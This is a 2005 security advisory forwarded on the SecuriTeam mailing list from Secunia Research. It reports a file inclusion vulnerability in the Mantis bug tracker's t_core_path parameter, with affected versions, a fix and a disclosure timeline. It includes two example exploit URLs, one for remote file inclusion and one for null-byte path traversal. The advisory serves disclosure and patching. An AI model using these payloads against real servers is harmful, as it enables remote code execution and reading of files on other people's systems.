[UNIX] Mantis File Inclusion Vulnerability (t_core_path)
From: SecuriTeam (support_at_securiteam.com)
Date: 10/31/05
To: list@securiteam.com Date: 31 Oct 2005 08:53:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Mantis File Inclusion Vulnerability (t_core_path)
------------------------------------------------------------------------
SUMMARY
<http://www.mantisbt.org/> Mantis is "a web-based bugtracking system. It
is written in the PHP scripting language and requires the MySQL database
and a webserver". Mantis is vulnerable to file inclusion due to a lack of
input sanitization in the bug_sponsorship_list_view_inc.php file.
DETAILS
Vulnerable Systems:
 * Mantis versions 0.19.2 and 1.0.0rc2 (other versions suspected)
Immune Systems:
 * Mantis version 0.19.3
Input passed to the "t_core_path" parameter in
"bug_sponsorship_list_view_inc.php" isn't properly verified before it is
used to include files. This can be exploited to include arbitrary files
from external and local resources.
Examples:
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php?
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../[file]%00
Successful exploitation requires that "register_globals" is enabled (not
a recommended setting).
Solution:
Update to Mantis version 0.19.3
<http://sourceforge.net/project/showfiles.php?group_id=14963>
Disclosure Timeline:
19.09.05 - Vulnerability discovered
19.09.05 - Vendor notified
11.10.05 - Vendor issues new version
26.10.05 - Public disclosure
ADDITIONAL INFORMATION
The information has been provided by Andreas Sandblad, Secunia Research.
The original article can be found at:
<http://secunia.com/secunia_research/2005-46/advisory/>
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.